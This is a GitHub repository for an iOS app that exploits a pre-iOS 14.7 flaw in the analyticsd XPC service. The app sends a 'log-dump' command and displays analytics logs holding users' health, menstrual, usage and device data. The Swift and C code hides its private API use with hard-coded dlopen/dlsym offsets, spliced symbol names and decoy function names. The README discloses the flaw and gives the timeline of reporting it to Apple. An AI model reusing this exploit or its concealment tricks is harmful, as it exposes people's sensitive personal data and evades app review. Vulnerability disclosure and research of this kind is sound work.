Repository: illusionofchaos/ios-analyticsd-pre14.7-exploit
Branch: main
Commit: a617cb0c5f37
Files: 15
Total size: 29.1 KB
Directory structure:
gitextract_735k5gzs/
├── .gitignore
├── Analyticsd/
│ ├── Analyticsd-Bridging-Header.h
│ ├── AnalyticsdApp.swift
│ ├── Assets.xcassets/
│ │ ├── AccentColor.colorset/
│ │ │ └── Contents.json
│ │ ├── AppIcon.appiconset/
│ │ │ └── Contents.json
│ │ └── Contents.json
│ ├── ContentView.swift
│ ├── Info.plist
│ ├── Preview Content/
│ │ └── Preview Assets.xcassets/
│ │ └── Contents.json
│ ├── c.c
│ └── c.h
├── Analyticsd.xcodeproj/
│ ├── project.pbxproj
│ └── project.xcworkspace/
│ ├── contents.xcworkspacedata
│ └── xcshareddata/
│ └── IDEWorkspaceChecks.plist
└── README.md
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitignore
================================================
# Xcode
#
# gitignore contributors: remember to update Global/Xcode.gitignore, Objective-C.gitignore & Swift.gitignore
## User settings
xcuserdata/
## compatibility with Xcode 8 and earlier (ignoring not required starting Xcode 9)
*.xcscmblueprint
*.xccheckout
## compatibility with Xcode 3 and earlier (ignoring not required starting Xcode 4)
build/
DerivedData/
*.moved-aside
*.pbxuser
!default.pbxuser
*.mode1v3
!default.mode1v3
*.mode2v3
!default.mode2v3
*.perspectivev3
!default.perspectivev3
## Obj-C/Swift specific
*.hmap
## App packaging
*.ipa
*.dSYM.zip
*.dSYM
## Playgrounds
timeline.xctimeline
playground.xcworkspace
# Swift Package Manager
#
# Add this line if you want to avoid checking in source code from Swift Package Manager dependencies.
# Packages/
# Package.pins
# Package.resolved
# *.xcodeproj
#
# Xcode automatically generates this directory with a .xcworkspacedata file and xcuserdata
# hence it is not needed unless you have added a package configuration file to your project
# .swiftpm
.build/
# CocoaPods
#
# We recommend against adding the Pods directory to your .gitignore. However
# you should judge for yourself, the pros and cons are mentioned at:
# https://guides.cocoapods.org/using/using-cocoapods.html#should-i-check-the-pods-directory-into-source-control
#
# Pods/
#
# Add this line if you want to avoid checking in source code from the Xcode workspace
# *.xcworkspace
# Carthage
#
# Add this line if you want to avoid checking in source code from Carthage dependencies.
# Carthage/Checkouts
Carthage/Build/
# Accio dependency management
Dependencies/
.accio/
# fastlane
#
# It is recommended to not store the screenshots in the git repo.
# Instead, use fastlane to re-generate the screenshots whenever they are needed.
# For more information about the recommended setup visit:
# https://docs.fastlane.tools/best-practices/source-control/#source-control
fastlane/report.xml
fastlane/Preview.html
fastlane/screenshots/**/*.png
fastlane/test_output
# Code Injection
#
# After new code Injection tools there's a generated folder /iOSInjectionProject
# https://github.com/johnno1962/injectionforxcode
iOSInjectionProject/
================================================
FILE: Analyticsd/Analyticsd-Bridging-Header.h
================================================
#include "c.h"
//
//@import Foundation;
//
//typedef void * xpc_object_t;
//typedef void * xpc_connection_t;
//typedef void (^xpc_handler_t)(xpc_object_t object);
//
//xpc_connection_t xpc_connection_create_mach_service(const char *name, dispatch_queue_t targetq, uint64_t flags);
//void xpc_connection_set_event_handler(xpc_connection_t connection, xpc_handler_t handler);
//void xpc_connection_resume(xpc_connection_t connection);
//xpc_object_t xpc_dictionary_create(const char *const _Nonnull *keys, xpc_object_t _Nullable const *values, size_t count);
//void xpc_dictionary_set_string(xpc_object_t xdict, const char *key, const char *string);
//xpc_object_t xpc_connection_send_message_with_reply_sync(xpc_connection_t connection, xpc_object_t message);
//const char * xpc_dictionary_get_string(xpc_object_t xdict, const char *key);
================================================
FILE: Analyticsd/AnalyticsdApp.swift
================================================
import SwiftUI
@main
struct AnalyticsdApp: App {
var body: some Scene {
WindowGroup {
ContentView()
}
}
}
================================================
FILE: Analyticsd/Assets.xcassets/AccentColor.colorset/Contents.json
================================================
{
"colors" : [
{
"idiom" : "universal"
}
],
"info" : {
"author" : "xcode",
"version" : 1
}
}
================================================
FILE: Analyticsd/Assets.xcassets/AppIcon.appiconset/Contents.json
================================================
{
"images" : [
{
"idiom" : "iphone",
"scale" : "2x",
"size" : "20x20"
},
{
"idiom" : "iphone",
"scale" : "3x",
"size" : "20x20"
},
{
"idiom" : "iphone",
"scale" : "2x",
"size" : "29x29"
},
{
"idiom" : "iphone",
"scale" : "3x",
"size" : "29x29"
},
{
"idiom" : "iphone",
"scale" : "2x",
"size" : "40x40"
},
{
"idiom" : "iphone",
"scale" : "3x",
"size" : "40x40"
},
{
"idiom" : "iphone",
"scale" : "2x",
"size" : "60x60"
},
{
"idiom" : "iphone",
"scale" : "3x",
"size" : "60x60"
},
{
"idiom" : "ipad",
"scale" : "1x",
"size" : "20x20"
},
{
"idiom" : "ipad",
"scale" : "2x",
"size" : "20x20"
},
{
"idiom" : "ipad",
"scale" : "1x",
"size" : "29x29"
},
{
"idiom" : "ipad",
"scale" : "2x",
"size" : "29x29"
},
{
"idiom" : "ipad",
"scale" : "1x",
"size" : "40x40"
},
{
"idiom" : "ipad",
"scale" : "2x",
"size" : "40x40"
},
{
"idiom" : "ipad",
"scale" : "1x",
"size" : "76x76"
},
{
"idiom" : "ipad",
"scale" : "2x",
"size" : "76x76"
},
{
"idiom" : "ipad",
"scale" : "2x",
"size" : "83.5x83.5"
},
{
"idiom" : "ios-marketing",
"scale" : "1x",
"size" : "1024x1024"
}
],
"info" : {
"author" : "xcode",
"version" : 1
}
}
================================================
FILE: Analyticsd/Assets.xcassets/Contents.json
================================================
{
"info" : {
"author" : "xcode",
"version" : 1
}
}
================================================
FILE: Analyticsd/ContentView.swift
================================================
import SwiftUI
struct ContentView: View {
@State var json = ""
@State var jsonData: [(String,Any)] = []
var body: some View {
NavigationView {
if !json.isEmpty {
List {
NavigationLink("Tree", destination: TreeView(data: jsonData))
NavigationLink("Raw JSON", destination: ScrollView(.vertical, showsIndicators: true, content: {
Text(json)
}))
}
} else {
Text("wait")
}
}
.onAppear {
json = analyticsJson()
jsonData = (try! JSONSerialization.jsonObject(with: json.data(using: .utf8)!, options: []) as! [String:Any]).sorted { $0.key < $1.key }
}
}
}
struct TreeView: View {
let data: [(String,Any)]
var body: some View {
List(data, id: \.0) { row in
if let value = row.1 as? [String:Any] {
NavigationLink(row.0, destination: TreeView(data: value.sorted { $0.key < $1.key }))
} else if let value = row.1 as? [[String:Any]] {
NavigationLink(row.0, destination:
List(Dictionary(grouping: value, by: { ($0["name"] as? String) ?? "no name" })
.sorted { $0.key < $1.key }, id: \.0) { row in
let messages = row.1.map { ($0["message"] as? [String:Any])?.sorted { $0.key < $1.key } ?? []}
NavigationLink(row.0, destination:
List {
ForEach(messages, id: \.description) { message in
Section(content: {
ForEach(message, id: \.key) { row in
HStack {
Text(row.0)
Spacer()
Text("\(row.1)" as String)
}
}
})
}
}.listStyle(GroupedListStyle())
)
}
)
} else {
HStack {
Text(row.0)
Spacer()
Text("\(row.1)" as String)
}
}
}
}
}
let dylib = normal_function1(["/usr/lib/system/libxp", ".dylib"].joined(separator: "c"), 0)
let normalFunction3 = unsafeBitCast(normal_function2(dylib, ["xp", "_connection_create_mach_service"].joined(separator: "c")), to: (@convention(c) (UnsafePointer<CChar>, DispatchQueue?, UInt64) -> (OpaquePointer)).self)
let normalFunction4 = unsafeBitCast(normal_function2(dylib, ["xp", "_connection_set_event_handler"].joined(separator: "c")), to: (@convention(c) (OpaquePointer, @escaping (OpaquePointer) -> Void) -> Void).self)
let normalFunction5 = unsafeBitCast(normal_function2(dylib, ["xp", "_connection_resume"].joined(separator: "c")), to: (@convention(c) (OpaquePointer) -> Void).self)
let normalFunction6 = unsafeBitCast(normal_function2(dylib, ["xp", "_dictionary_create"].joined(separator: "c")), to: (@convention(c) (OpaquePointer?, OpaquePointer?, Int) -> OpaquePointer).self)
let normalFunction7 = unsafeBitCast(normal_function2(dylib, ["xp", "_dictionary_set_string"].joined(separator: "c")), to: (@convention(c) (OpaquePointer, UnsafePointer<CChar>, UnsafePointer<CChar>) -> Void).self)
let normalFunction8 = unsafeBitCast(normal_function2(dylib, ["xp", "_connection_send_message_with_reply_sync"].joined(separator: "c")), to: (@convention(c) (OpaquePointer, OpaquePointer) -> OpaquePointer).self)
let normalFunction9 = unsafeBitCast(normal_function2(dylib, ["xp", "_dictionary_get_string"].joined(separator: "c")), to: (@convention(c) (OpaquePointer, UnsafePointer<CChar>) -> UnsafePointer<CChar>).self)
func analyticsJson() -> String {
let connection = normalFunction3("com.apple.analyticsd", nil, 2)
normalFunction4(connection, { _ in })
normalFunction5(connection)
let xdict = normalFunction6(nil, nil, 0)
normalFunction7(xdict, "command", "log-dump")
let reply = normalFunction8(connection, xdict)
return String(cString: normalFunction9(reply, "log-dump"))
}
//
//func analyticsJson() -> String {
// let connection = xpc_connection_create_mach_service("com.apple.analyticsd", nil, 2)
// xpc_connection_set_event_handler(connection, { _ in })
// xpc_connection_resume(connection)
// let xdict = xpc_dictionary_create(nil, nil, 0)
// xpc_dictionary_set_string(xdict, "command", "log-dump")
// let reply = xpc_connection_send_message_with_reply_sync(connection, xdict)
// return String(cString: xpc_dictionary_get_string(reply, "log-dump"))
//}
================================================
FILE: Analyticsd/Info.plist
================================================
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleDevelopmentRegion</key>
<string>$(DEVELOPMENT_LANGUAGE)</string>
<key>CFBundleExecutable</key>
<string>$(EXECUTABLE_NAME)</string>
<key>CFBundleIdentifier</key>
<string>$(PRODUCT_BUNDLE_IDENTIFIER)</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundleName</key>
<string>$(PRODUCT_NAME)</string>
<key>CFBundlePackageType</key>
<string>$(PRODUCT_BUNDLE_PACKAGE_TYPE)</string>
<key>CFBundleShortVersionString</key>
<string>1.0</string>
<key>CFBundleVersion</key>
<string>1</string>
<key>LSRequiresIPhoneOS</key>
<true/>
<key>UIApplicationSceneManifest</key>
<dict>
<key>UIApplicationSupportsMultipleScenes</key>
<true/>
</dict>
<key>UIApplicationSupportsIndirectInputEvents</key>
<true/>
<key>UILaunchScreen</key>
<dict/>
<key>UIRequiredDeviceCapabilities</key>
<array>
<string>armv7</string>
</array>
<key>UISupportedInterfaceOrientations</key>
<array>
<string>UIInterfaceOrientationPortrait</string>
<string>UIInterfaceOrientationLandscapeLeft</string>
<string>UIInterfaceOrientationLandscapeRight</string>
</array>
<key>UISupportedInterfaceOrientations~ipad</key>
<array>
<string>UIInterfaceOrientationPortrait</string>
<string>UIInterfaceOrientationPortraitUpsideDown</string>
<string>UIInterfaceOrientationLandscapeLeft</string>
<string>UIInterfaceOrientationLandscapeRight</string>
</array>
</dict>
</plist>
================================================
FILE: Analyticsd/Preview Content/Preview Assets.xcassets/Contents.json
================================================
{
"info" : {
"author" : "xcode",
"version" : 1
}
}
================================================
FILE: Analyticsd/c.c
================================================
#include "c.h"
void * normal_function1(const char * arg1, int arg2) {
return ((void *(*)(const char *, int))((long long)dyld_stub_binder - 20780))(arg1, arg2);
}
void * normal_function2(void * arg1, const char * arg2) {
return ((void *(*)(void *, const char *))((long long)dyld_stub_binder - 20648))(arg1, arg2);
}
//
//#include <dlfcn.h>
//#include <stdio.h>
//void findOffsets() {
// printf("%lld\n",(long long)dyld_stub_binder - (long long)dlopen); // 20780
// printf("%lld\n",(long long)dyld_stub_binder - (long long)dlsym); // 20648
//}
================================================
FILE: Analyticsd/c.h
================================================
#ifndef c_h
#define c_h
#define NO_UND(func) extern void func(void) asm(#func);
NO_UND(dyld_stub_binder);
void * normal_function1(const char * arg1, int arg2); // dlopen
void * normal_function2(void * arg1, const char * arg2); // dlsym
//void findOffsets();
#endif /* c_h */
================================================
FILE: Analyticsd.xcodeproj/project.pbxproj
================================================
// !$*UTF8*$!
{
archiveVersion = 1;
classes = {
};
objectVersion = 50;
objects = {
/* Begin PBXBuildFile section */
DF0878E12701ED240055F994 /* c.c in Sources */ = {isa = PBXBuildFile; fileRef = DF0878E02701ED240055F994 /* c.c */; };
DF41FC762638AE09007214FA /* AnalyticsdApp.swift in Sources */ = {isa = PBXBuildFile; fileRef = DF41FC752638AE09007214FA /* AnalyticsdApp.swift */; };
DF41FC782638AE09007214FA /* ContentView.swift in Sources */ = {isa = PBXBuildFile; fileRef = DF41FC772638AE09007214FA /* ContentView.swift */; };
DF41FC7A2638AE0B007214FA /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = DF41FC792638AE0B007214FA /* Assets.xcassets */; };
DF41FC7D2638AE0B007214FA /* Preview Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = DF41FC7C2638AE0B007214FA /* Preview Assets.xcassets */; };
/* End PBXBuildFile section */
/* Begin PBXFileReference section */
DF0878DF2701ED240055F994 /* c.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = c.h; sourceTree = "<group>"; };
DF0878E02701ED240055F994 /* c.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = c.c; sourceTree = "<group>"; };
DF41FC722638AE09007214FA /* Analyticsd.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = Analyticsd.app; sourceTree = BUILT_PRODUCTS_DIR; };
DF41FC752638AE09007214FA /* AnalyticsdApp.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = AnalyticsdApp.swift; sourceTree = "<group>"; };
DF41FC772638AE09007214FA /* ContentView.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = ContentView.swift; sourceTree = "<group>"; };
DF41FC792638AE0B007214FA /* Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = Assets.xcassets; sourceTree = "<group>"; };
DF41FC7C2638AE0B007214FA /* Preview Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = "Preview Assets.xcassets"; sourceTree = "<group>"; };
DF41FC7E2638AE0B007214FA /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = "<group>"; };
DF41FC842638AE2F007214FA /* Analyticsd-Bridging-Header.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = "Analyticsd-Bridging-Header.h"; sourceTree = "<group>"; };
/* End PBXFileReference section */
/* Begin PBXFrameworksBuildPhase section */
DF41FC6F2638AE09007214FA /* Frameworks */ = {
isa = PBXFrameworksBuildPhase;
buildActionMask = 2147483647;
files = (
);
runOnlyForDeploymentPostprocessing = 0;
};
/* End PBXFrameworksBuildPhase section */
/* Begin PBXGroup section */
DF41FC692638AE09007214FA = {
isa = PBXGroup;
children = (
DF41FC742638AE09007214FA /* Analyticsd */,
DF41FC732638AE09007214FA /* Products */,
);
sourceTree = "<group>";
};
DF41FC732638AE09007214FA /* Products */ = {
isa = PBXGroup;
children = (
DF41FC722638AE09007214FA /* Analyticsd.app */,
);
name = Products;
sourceTree = "<group>";
};
DF41FC742638AE09007214FA /* Analyticsd */ = {
isa = PBXGroup;
children = (
DF41FC752638AE09007214FA /* AnalyticsdApp.swift */,
DF41FC772638AE09007214FA /* ContentView.swift */,
DF41FC792638AE0B007214FA /* Assets.xcassets */,
DF41FC7E2638AE0B007214FA /* Info.plist */,
DF41FC7B2638AE0B007214FA /* Preview Content */,
DF41FC842638AE2F007214FA /* Analyticsd-Bridging-Header.h */,
DF0878DF2701ED240055F994 /* c.h */,
DF0878E02701ED240055F994 /* c.c */,
);
path = Analyticsd;
sourceTree = "<group>";
};
DF41FC7B2638AE0B007214FA /* Preview Content */ = {
isa = PBXGroup;
children = (
DF41FC7C2638AE0B007214FA /* Preview Assets.xcassets */,
);
path = "Preview Content";
sourceTree = "<group>";
};
/* End PBXGroup section */
/* Begin PBXNativeTarget section */
DF41FC712638AE09007214FA /* Analyticsd */ = {
isa = PBXNativeTarget;
buildConfigurationList = DF41FC812638AE0B007214FA /* Build configuration list for PBXNativeTarget "Analyticsd" */;
buildPhases = (
DF41FC6E2638AE09007214FA /* Sources */,
DF41FC6F2638AE09007214FA /* Frameworks */,
DF41FC702638AE09007214FA /* Resources */,
);
buildRules = (
);
dependencies = (
);
name = Analyticsd;
productName = Analyticsd;
productReference = DF41FC722638AE09007214FA /* Analyticsd.app */;
productType = "com.apple.product-type.application";
};
/* End PBXNativeTarget section */
/* Begin PBXProject section */
DF41FC6A2638AE09007214FA /* Project object */ = {
isa = PBXProject;
attributes = {
LastSwiftUpdateCheck = 1250;
LastUpgradeCheck = 1250;
TargetAttributes = {
DF41FC712638AE09007214FA = {
CreatedOnToolsVersion = 12.5;
LastSwiftMigration = 1250;
};
};
};
buildConfigurationList = DF41FC6D2638AE09007214FA /* Build configuration list for PBXProject "Analyticsd" */;
compatibilityVersion = "Xcode 9.3";
developmentRegion = en;
hasScannedForEncodings = 0;
knownRegions = (
en,
Base,
);
mainGroup = DF41FC692638AE09007214FA;
productRefGroup = DF41FC732638AE09007214FA /* Products */;
projectDirPath = "";
projectRoot = "";
targets = (
DF41FC712638AE09007214FA /* Analyticsd */,
);
};
/* End PBXProject section */
/* Begin PBXResourcesBuildPhase section */
DF41FC702638AE09007214FA /* Resources */ = {
isa = PBXResourcesBuildPhase;
buildActionMask = 2147483647;
files = (
DF41FC7D2638AE0B007214FA /* Preview Assets.xcassets in Resources */,
DF41FC7A2638AE0B007214FA /* Assets.xcassets in Resources */,
);
runOnlyForDeploymentPostprocessing = 0;
};
/* End PBXResourcesBuildPhase section */
/* Begin PBXSourcesBuildPhase section */
DF41FC6E2638AE09007214FA /* Sources */ = {
isa = PBXSourcesBuildPhase;
buildActionMask = 2147483647;
files = (
DF0878E12701ED240055F994 /* c.c in Sources */,
DF41FC782638AE09007214FA /* ContentView.swift in Sources */,
DF41FC762638AE09007214FA /* AnalyticsdApp.swift in Sources */,
);
runOnlyForDeploymentPostprocessing = 0;
};
/* End PBXSourcesBuildPhase section */
/* Begin XCBuildConfiguration section */
DF41FC7F2638AE0B007214FA /* Debug */ = {
isa = XCBuildConfiguration;
buildSettings = {
ALWAYS_SEARCH_USER_PATHS = NO;
CLANG_ANALYZER_NONNULL = YES;
CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE;
CLANG_CXX_LANGUAGE_STANDARD = "gnu++14";
CLANG_CXX_LIBRARY = "libc++";
CLANG_ENABLE_MODULES = YES;
CLANG_ENABLE_OBJC_ARC = YES;
CLANG_ENABLE_OBJC_WEAK = YES;
CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES;
CLANG_WARN_BOOL_CONVERSION = YES;
CLANG_WARN_COMMA = YES;
CLANG_WARN_CONSTANT_CONVERSION = YES;
CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES;
CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR;
CLANG_WARN_DOCUMENTATION_COMMENTS = YES;
CLANG_WARN_EMPTY_BODY = YES;
CLANG_WARN_ENUM_CONVERSION = YES;
CLANG_WARN_INFINITE_RECURSION = YES;
CLANG_WARN_INT_CONVERSION = YES;
CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES;
CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES;
CLANG_WARN_OBJC_LITERAL_CONVERSION = YES;
CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR;
CLANG_WARN_QUOTED_INCLUDE_IN_FRAMEWORK_HEADER = YES;
CLANG_WARN_RANGE_LOOP_ANALYSIS = YES;
CLANG_WARN_STRICT_PROTOTYPES = YES;
CLANG_WARN_SUSPICIOUS_MOVE = YES;
CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE;
CLANG_WARN_UNREACHABLE_CODE = YES;
CLANG_WARN__DUPLICATE_METHOD_MATCH = YES;
COPY_PHASE_STRIP = NO;
DEBUG_INFORMATION_FORMAT = dwarf;
ENABLE_STRICT_OBJC_MSGSEND = YES;
ENABLE_TESTABILITY = YES;
GCC_C_LANGUAGE_STANDARD = gnu11;
GCC_DYNAMIC_NO_PIC = NO;
GCC_NO_COMMON_BLOCKS = YES;
GCC_OPTIMIZATION_LEVEL = 0;
GCC_PREPROCESSOR_DEFINITIONS = (
"DEBUG=1",
"$(inherited)",
);
GCC_WARN_64_TO_32_BIT_CONVERSION = YES;
GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR;
GCC_WARN_UNDECLARED_SELECTOR = YES;
GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE;
GCC_WARN_UNUSED_FUNCTION = YES;
GCC_WARN_UNUSED_VARIABLE = YES;
IPHONEOS_DEPLOYMENT_TARGET = 14.5;
MTL_ENABLE_DEBUG_INFO = INCLUDE_SOURCE;
MTL_FAST_MATH = YES;
ONLY_ACTIVE_ARCH = YES;
SDKROOT = iphoneos;
SWIFT_ACTIVE_COMPILATION_CONDITIONS = DEBUG;
SWIFT_OPTIMIZATION_LEVEL = "-Onone";
};
name = Debug;
};
DF41FC802638AE0B007214FA /* Release */ = {
isa = XCBuildConfiguration;
buildSettings = {
ALWAYS_SEARCH_USER_PATHS = NO;
CLANG_ANALYZER_NONNULL = YES;
CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE;
CLANG_CXX_LANGUAGE_STANDARD = "gnu++14";
CLANG_CXX_LIBRARY = "libc++";
CLANG_ENABLE_MODULES = YES;
CLANG_ENABLE_OBJC_ARC = YES;
CLANG_ENABLE_OBJC_WEAK = YES;
CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES;
CLANG_WARN_BOOL_CONVERSION = YES;
CLANG_WARN_COMMA = YES;
CLANG_WARN_CONSTANT_CONVERSION = YES;
CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES;
CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR;
CLANG_WARN_DOCUMENTATION_COMMENTS = YES;
CLANG_WARN_EMPTY_BODY = YES;
CLANG_WARN_ENUM_CONVERSION = YES;
CLANG_WARN_INFINITE_RECURSION = YES;
CLANG_WARN_INT_CONVERSION = YES;
CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES;
CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES;
CLANG_WARN_OBJC_LITERAL_CONVERSION = YES;
CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR;
CLANG_WARN_QUOTED_INCLUDE_IN_FRAMEWORK_HEADER = YES;
CLANG_WARN_RANGE_LOOP_ANALYSIS = YES;
CLANG_WARN_STRICT_PROTOTYPES = YES;
CLANG_WARN_SUSPICIOUS_MOVE = YES;
CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE;
CLANG_WARN_UNREACHABLE_CODE = YES;
CLANG_WARN__DUPLICATE_METHOD_MATCH = YES;
COPY_PHASE_STRIP = NO;
DEBUG_INFORMATION_FORMAT = "dwarf-with-dsym";
ENABLE_NS_ASSERTIONS = NO;
ENABLE_STRICT_OBJC_MSGSEND = YES;
GCC_C_LANGUAGE_STANDARD = gnu11;
GCC_NO_COMMON_BLOCKS = YES;
GCC_WARN_64_TO_32_BIT_CONVERSION = YES;
GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR;
GCC_WARN_UNDECLARED_SELECTOR = YES;
GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE;
GCC_WARN_UNUSED_FUNCTION = YES;
GCC_WARN_UNUSED_VARIABLE = YES;
IPHONEOS_DEPLOYMENT_TARGET = 14.5;
MTL_ENABLE_DEBUG_INFO = NO;
MTL_FAST_MATH = YES;
SDKROOT = iphoneos;
SWIFT_COMPILATION_MODE = wholemodule;
SWIFT_OPTIMIZATION_LEVEL = "-O";
VALIDATE_PRODUCT = YES;
};
name = Release;
};
DF41FC822638AE0B007214FA /* Debug */ = {
isa = XCBuildConfiguration;
buildSettings = {
ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon;
ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor;
CLANG_ENABLE_MODULES = YES;
CODE_SIGN_STYLE = Automatic;
DEVELOPMENT_ASSET_PATHS = "\"Analyticsd/Preview Content\"";
DEVELOPMENT_TEAM = ZGR22SPY5B;
ENABLE_PREVIEWS = YES;
INFOPLIST_FILE = Analyticsd/Info.plist;
IPHONEOS_DEPLOYMENT_TARGET = 14.0;
LD_RUNPATH_SEARCH_PATHS = (
"$(inherited)",
"@executable_path/Frameworks",
);
PRODUCT_BUNDLE_IDENTIFIER = dt.Analyticsd;
PRODUCT_NAME = "$(TARGET_NAME)";
SWIFT_OBJC_BRIDGING_HEADER = "Analyticsd/Analyticsd-Bridging-Header.h";
SWIFT_OPTIMIZATION_LEVEL = "-Onone";
SWIFT_VERSION = 5.0;
TARGETED_DEVICE_FAMILY = "1,2";
};
name = Debug;
};
DF41FC832638AE0B007214FA /* Release */ = {
isa = XCBuildConfiguration;
buildSettings = {
ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon;
ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor;
CLANG_ENABLE_MODULES = YES;
CODE_SIGN_STYLE = Automatic;
DEVELOPMENT_ASSET_PATHS = "\"Analyticsd/Preview Content\"";
DEVELOPMENT_TEAM = ZGR22SPY5B;
ENABLE_PREVIEWS = YES;
INFOPLIST_FILE = Analyticsd/Info.plist;
IPHONEOS_DEPLOYMENT_TARGET = 14.0;
LD_RUNPATH_SEARCH_PATHS = (
"$(inherited)",
"@executable_path/Frameworks",
);
PRODUCT_BUNDLE_IDENTIFIER = dt.Analyticsd;
PRODUCT_NAME = "$(TARGET_NAME)";
SWIFT_OBJC_BRIDGING_HEADER = "Analyticsd/Analyticsd-Bridging-Header.h";
SWIFT_VERSION = 5.0;
TARGETED_DEVICE_FAMILY = "1,2";
};
name = Release;
};
/* End XCBuildConfiguration section */
/* Begin XCConfigurationList section */
DF41FC6D2638AE09007214FA /* Build configuration list for PBXProject "Analyticsd" */ = {
isa = XCConfigurationList;
buildConfigurations = (
DF41FC7F2638AE0B007214FA /* Debug */,
DF41FC802638AE0B007214FA /* Release */,
);
defaultConfigurationIsVisible = 0;
defaultConfigurationName = Release;
};
DF41FC812638AE0B007214FA /* Build configuration list for PBXNativeTarget "Analyticsd" */ = {
isa = XCConfigurationList;
buildConfigurations = (
DF41FC822638AE0B007214FA /* Debug */,
DF41FC832638AE0B007214FA /* Release */,
);
defaultConfigurationIsVisible = 0;
defaultConfigurationName = Release;
};
/* End XCConfigurationList section */
};
rootObject = DF41FC6A2638AE09007214FA /* Project object */;
}
================================================
FILE: Analyticsd.xcodeproj/project.xcworkspace/contents.xcworkspacedata
================================================
<?xml version="1.0" encoding="UTF-8"?>
<Workspace
version = "1.0">
<FileRef
location = "self:">
</FileRef>
</Workspace>
================================================
FILE: Analyticsd.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist
================================================
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>IDEDidComputeMac32BitWarning</key>
<true/>
</dict>
</plist>
================================================
FILE: README.md
================================================
# Analyticsd pre-14.7 exploit
I've updated this code to avoid using Private API directly. Read more in my [blog post](https://habr.com/en/post/580272/). However, that means that now this code is iOS version-specific and possibly device model-specific. So if it doesn't work on your device, recalculate and update the offsets in `c.c` file. The original code can be found in [direct](https://github.com/illusionofchaos/ios-analyticsd-pre14.7-exploit/tree/direct) branch.
This vulnerability allows any user-installed app to access analytics logs (such as the ones that you can see in **Settings -> Privacy -> Analytics & Improvements -> Analytics Data -> Analytics-90Day... and Analytics-Daily...**). These logs contain the following information (including, but not limited to):
- medical information (heart rate, count of detected atrial fibrillation and irregular heart rythm events)
- menstrual cycle length, biological sex and age, whether user is logging sexual activity, cervical mucus quality, etc.
- device usage information (device pickups in different contexts, push notifications count and user's action, etc.)
- screen time information and session count for all applications with their respective bundle IDs
- information about device accessories with their manufacturer, model, firmware version and user-assigned names
- application crashes with bundle IDs and exception codes
- languages of web pages that user viewed in Safari
All this information is being collected by Apple for unknown purposes, which is quite disturbing, especially the fact that medical information is being collected. That's why it's very hypocritical of Apple to [claim that they deeply care about privacy](https://www.apple.com/privacy/).
All this data was being collected and available to an attacker even if "Share analytics" was turned off in settings.
```
const char * analytics_json(void) {
xpc_connection_t connection = xpc_connection_create_mach_service("com.apple.analyticsd", NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
xpc_connection_set_event_handler(connection, (^(xpc_object_t object){}));
xpc_connection_resume(connection);
xpc_object_t xdict = xpc_dictionary_create(0, 0, 0);
xpc_dictionary_set_string(xdict, "command", "log-dump");
xpc_object_t reply = xpc_connection_send_message_with_reply_sync(connection, xdict);
return xpc_dictionary_get_string(reply, "log-dump");
}
```
Timeline:
April 29 2021 - I sent a detailed report to Apple
April 30 2021 - Apple replied that they had reviewed the report and are investigated
May 20 2021 - I've requested a status update from Apple (and recieved no reply)
May 30 2021 - I've requested a status update from Apple
June 3 2021 - Apple replied that they plan to address the issue in the upcoming update
July 19 2021 - iOS 14.7 is released with the fix
July 20 2021 - I've requested a status update from Apple
July 21 2021 - iOS 14.7 security contents list is published, this vulnerability is not mentioned (https://support.apple.com/en-us/HT212601)
July 22 2021 - I've asked Apple a question why the vulnerability is not on the list
Same day I receive the following reply: **Due to a processing issue, your credit will be included on the security advisories in an upcoming update. We apologize for the inconvenience. **
July 26 2021 - iOS 14.7.1 security contents list is published, still no mention of this vulnerability (https://support.apple.com/en-us/HT212623)
